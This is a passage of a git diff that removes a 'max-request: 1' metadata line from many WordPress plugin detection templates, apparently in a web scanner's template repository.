https://wpscan.com/plugin/easy-fancybox tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index bcbc0707fb..fc44375947 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-table-of-contents/ metadata: - max-request: 1 plugin_namespace: easy-table-of-contents wpscan: https://wpscan.com/plugin/easy-table-of-contents tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index 8b23832297..a1616c1741 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-wp-smtp/ metadata: - max-request: 1 plugin_namespace: easy-wp-smtp wpscan: https://wpscan.com/plugin/easy-wp-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index f0c3e4bc63..6cfb8bc272 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/elementor/ metadata: - max-request: 1 plugin_namespace: elementor wpscan: https://wpscan.com/plugin/elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index eab4a0d725..9caaa53263 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/elementskit-lite/ metadata: - max-request: 1 plugin_namespace: elementskit-lite wpscan: https://wpscan.com/plugin/elementskit-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 74c172ac94..5e6b557952 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/enable-media-replace/ metadata: - max-request: 1 plugin_namespace: enable-media-replace wpscan: https://wpscan.com/plugin/enable-media-replace tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index f5a63a2ed2..c5a665e6f7 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/envato-elements/ metadata: - max-request: 1 plugin_namespace: envato-elements wpscan: https://wpscan.com/plugin/envato-elements tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 25ca7328ef..a8b56b5df0 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ metadata: - max-request: 1 plugin_namespace: essential-addons-for-elementor-lite wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index cb1db5bee6..4e20e57107 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ewww-image-optimizer/ metadata: - max-request: 1 plugin_namespace: ewww-image-optimizer wpscan: https://wpscan.com/plugin/ewww-image-optimizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index a3207ea16a..6f6a416595 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/facebook-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: facebook-for-woocommerce wpscan: https://wpscan.com/plugin/facebook-for-woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a4b772078..2dd0ef57b5 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/fast-indexing-api/ metadata: - max-request: 1 plugin_namespace: fast-indexing-api wpscan: https://wpscan.com/plugin/fast-indexing-api tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 366205085d..11942f4fa4 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/favicon-by-realfavicongenerator/ metadata: - max-request: 1 plugin_namespace: favicon-by-realfavicongenerator wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 598f08ce88..87c2aeb4bd 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/flamingo/ metadata: - max-request: 1 plugin_namespace: flamingo wpscan: https://wpscan.com/plugin/flamingo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 42cdfb4475..3696eefbf7 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/fluentform/ metadata: - max-request: 1 plugin_namespace: fluentform wpscan: https://wpscan.com/plugin/fluentform tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index a1af263dbd..8bab0a9c3e 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/font-awesome/ metadata: - max-request: 1 plugin_namespace: font-awesome wpscan: https://wpscan.com/plugin/font-awesome tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index 19265f910e..affd270123 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/force-regenerate-thumbnails/ metadata: - max-request: 1 plugin_namespace: force-regenerate-thumbnails wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c21d414695..1e6a62e23b 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/formidable/ metadata: - max-request: 1 plugin_namespace: formidable wpscan: https://wpscan.com/plugin/formidable tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 91c89d0ad8..980265f531 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/forminator/ metadata: - max-request: 1 plugin_namespace: forminator wpscan: https://wpscan.com/plugin/forminator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index 539d9f7cec..daf205789d 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ga-google-analytics/ metadata: - max-request: 1 plugin_namespace: ga-google-analytics wpscan: https://wpscan.com/plugin/ga-google-analytics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index f4123bb594..22bfa3ffe2 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gdpr-cookie-compliance/ metadata: - max-request: 1 plugin_namespace: gdpr-cookie-compliance wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 254f916291..7ed171d662 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/ metadata: - max-request: 1 plugin_namespace: google-analytics-dashboard-for-wp wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 8074ac337e..ad238445fc 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-analytics-for-wordpress/ metadata: - max-request: 1 plugin_namespace: google-analytics-for-wordpress wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index b9de0ee313..7161671960 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-listings-and-ads/ metadata: - max-request: 1 plugin_namespace: google-listings-and-ads wpscan: https://wpscan.com/plugin/google-listings-and-ads tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 7b0f188ff7..2678f603c6 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-site-kit/ metadata: - max-request: 1 plugin_namespace: google-site-kit wpscan: https://wpscan.com/plugin/google-site-kit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 898e4de56d..20d947a5d1 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-sitemap-generator/ metadata: - max-request: 1 plugin_namespace: google-sitemap-generator wpscan: https://wpscan.com/plugin/google-sitemap-generator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 4a76856a69..22ee97b51f 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gtranslate/ metadata: - max-request: 1 plugin_namespace: gtranslate wpscan: https://wpscan.com/plugin/gtranslate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index b321ca63eb..3f4c6c8936 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gutenberg/ metadata: - max-request: 1 plugin_namespace: gutenberg wpscan: https://wpscan.com/plugin/gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 2b42c9f80c..fa1bb64115 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/happy-elementor-addons/ metadata: - max-request: 1 plugin_namespace: happy-elementor-addons wpscan: https://wpscan.com/plugin/happy-elementor-addons tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index dbea07a6da..da63d1cbf6 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer-code-manager/ metadata: - max-request: 1 plugin_namespace: header-footer-code-manager wpscan: https://wpscan.com/plugin/header-footer-code-manager tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 17a8f220cf..f94e7f6494 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer-elementor/ metadata: - max-request: 1 plugin_namespace: header-footer-elementor wpscan: https://wpscan.com/plugin/header-footer-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 956a08b32d..95d2aa5f16 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer/ metadata: - max-request: 1 plugin_namespace: header-footer wpscan: https://wpscan.com/plugin/header-footer tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 5a570b9077..af8193b875 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/health-check/ metadata: - max-request: 1 plugin_namespace: health-check wpscan: https://wpscan.com/plugin/health-check tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 4ecac0cd92..8d7e45818b 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/hello-dolly/ metadata: - max-request: 1 plugin_namespace: hello-dolly wpscan: https://wpscan.com/plugin/hello-dolly tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index e50f58cef8..ed3967db7b 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/host-webfonts-local/ metadata: - max-request: 1 plugin_namespace: host-webfonts-local wpscan: https://wpscan.com/plugin/host-webfonts-local tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 031bb48563..2ff5adba86 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/imagify/ metadata: - max-request: 1 plugin_namespace: imagify wpscan: https://wpscan.com/plugin/imagify tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 3cdcf3da93..9099f3c0a5 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/imsanity/ metadata: - max-request: 1 plugin_namespace: imsanity wpscan: https://wpscan.com/plugin/imsanity tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index c222bc9d4a..1ee0e67542 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/insert-headers-and-footers/ metadata: - max-request: 1 plugin_namespace: insert-headers-and-footers wpscan: https://wpscan.com/plugin/insert-headers-and-footers tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index c8acf8c625..43cb2ab09c 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/instagram-feed/ metadata: - max-request: 1 plugin_namespace: instagram-feed wpscan: https://wpscan.com/plugin/instagram-feed tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 66b7d6a363..7ba81036cf 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/intuitive-custom-post-order/ metadata: - max-request: 1 plugin_namespace: intuitive-custom-post-order wpscan: https://wpscan.com/plugin/intuitive-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index a36016562d..24fc3e3295 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/iwp-client/ metadata: - max-request: 1 plugin_namespace: iwp-client wpscan: https://wpscan.com/plugin/iwp-client tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 8033aacbc6..3e89505574 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/jetpack-boost/ metadata: - max-request: 1 plugin_namespace: jetpack-boost wpscan: https://wpscan.com/plugin/jetpack-boost tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index e4017b1a0a..e701e365ba 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/jetpack/ metadata: - max-request: 1 plugin_namespace: jetpack wpscan: https://wpscan.com/plugin/jetpack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 53d6d393bd..c0cc5400a8 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/kadence-blocks/ metadata: - max-request: 1 plugin_namespace: kadence-blocks wpscan: https://wpscan.com/plugin/kadence-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index c286e9a14f..22687bcffe 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/kirki/ metadata: - max-request: 1 plugin_namespace: kirki wpscan: https://wpscan.com/plugin/kirki tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 364e3cd71e..b69d3d5bfe 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/leadin/ metadata: - max-request: 1 plugin_namespace: leadin wpscan: https://wpscan.com/plugin/leadin tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 4fcccbfc33..7975a57702 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts-reloaded/ metadata: - max-request: 1 plugin_namespace: limit-login-attempts-reloaded wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 3fbc714d3b..ff4cef94d7 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts/ metadata: - max-request: 1 plugin_namespace: limit-login-attempts wpscan: https://wpscan.com/plugin/limit-login-attempts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index c49b506979..a8903697b0 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/litespeed-cache/ metadata: - max-request: 1 plugin_namespace: litespeed-cache wpscan: https://wpscan.com/plugin/litespeed-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index dfcaf6f71b..3f141c4476 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loco-translate/ metadata: - max-request: 1 plugin_namespace: loco-translate wpscan: https://wpscan.com/plugin/loco-translate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 61be246fee..5355e988a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loginizer/ metadata: - max-request: 1 plugin_namespace: loginizer wpscan: https://wpscan.com/plugin/loginizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml index 1c16a72d76..6f06b49011 100644 --- a/http/technologies/wordpress/plugins/loginpress.yaml +++ b/http/technologies/wordpress/plugins/loginpress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loginpress/ metadata: - max-request: 1 plugin_namespace: loginpress wpscan: https://wpscan.com/plugin/loginpress tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 50d2e6630b..53d409fb68 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: mailchimp-for-woocommerce wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 8d71f7bde9..0e908a9580 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-wp/ metadata: - max-request: 1 plugin_namespace: mailchimp-for-wp wpscan: https://wpscan.com/plugin/mailchimp-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index 5e1f97086e..aeb1875c57 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailpoet/ metadata: - max-request: 1 plugin_namespace: mailpoet wpscan: https://wpscan.com/plugin/mailpoet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index d87d456a8c..7c15702305 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/maintenance/ metadata: - max-request: 1 plugin_namespace: maintenance wpscan: https://wpscan.com/plugin/maintenance tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index aa9153241e..5ce87e6c71 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mainwp-child/ metadata: - max-request: 1 plugin_namespace: mainwp-child wpscan: https://wpscan.com/plugin/mainwp-child tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 09641796a3..c342e6b45a 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/malcare-security/ metadata: - max-request: 1 plugin_namespace: malcare-security wpscan: https://wpscan.com/plugin/malcare-security tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 28b70d09bf..e95041f555 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/megamenu/ metadata: - max-request: 1 plugin_namespace: megamenu wpscan: https://wpscan.com/plugin/megamenu tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/members.yaml 